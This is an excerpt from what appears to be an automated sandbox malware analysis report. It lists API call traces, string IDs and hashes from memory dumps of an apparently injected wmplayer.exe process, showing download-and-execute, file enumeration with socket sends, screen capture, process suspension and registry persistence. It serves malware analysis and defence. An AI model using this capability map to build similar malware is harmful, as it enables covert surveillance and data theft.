                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DownloadExecuteFileShell
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$open
                                                                                            • API String ID: 2825088817-2139661930
                                                                                            • Opcode ID: 2c5ecccaf9d8d6300355a8c97ec3bc5bb5caa3e4c444b5e8748fd5da19bd459b
                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                            • Opcode Fuzzy Hash: 2c5ecccaf9d8d6300355a8c97ec3bc5bb5caa3e4c444b5e8748fd5da19bd459b
                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNextsend
                                                                                            • String ID: x@G$x@G
                                                                                            • API String ID: 4113138495-3390264752
                                                                                            • Opcode ID: 3e4db3184a84fc6328c8a8d029d36169df7b41c99c804fe7392dd3c718430463
                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                            • Opcode Fuzzy Hash: 3e4db3184a84fc6328c8a8d029d36169df7b41c99c804fe7392dd3c718430463
                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                            • API String ID: 4127273184-3576401099
                                                                                            • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                            • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 4212172061-0
                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 301083792-0
                                                                                            • Opcode ID: 0d14dffab37c74e2ef2fdf1d452f6a773de622bb137113ec2d38ebded55a711f
                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                            • Opcode Fuzzy Hash: 0d14dffab37c74e2ef2fdf1d452f6a773de622bb137113ec2d38ebded55a711f
                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2829624132-0
                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                            APIs
                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1815803762-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
• TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
• ExitProcess.KERNEL32 ref: 10004AEE
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
• NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
• CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenSuspend
• String ID:
• API String ID: 1999457699-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
• NtResumeProcess.NTDLL(00000000), ref: 0041AD05
• CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenResume
• String ID:
• API String ID: 3614150671-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
Strings
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetCursorInfo.USER32(?), ref: 004180B5
• GetIconInfo.USER32(?,?), ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
• GetObjectA.GDI32(?,00000018,?), ref: 00418173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• DeleteDC.GDI32(00000000), ref: 00418282
• DeleteObject.GDI32(00000000), ref: 00418285
• GlobalFree.KERNEL32(00CC0020), ref: 00418290
• DeleteObject.GDI32(00000000), ref: 00418344
• GlobalFree.KERNEL32(?), ref: 0041834B
• DeleteDC.GDI32(?), ref: 0041835B
• DeleteDC.GDI32(00000000), ref: 00418366
• DeleteDC.GDI32(?), ref: 00418398
• DeleteDC.GDI32(00000000), ref: 0041839B
• DeleteObject.GDI32(?), ref: 004183A1
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1352755160-865373369
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
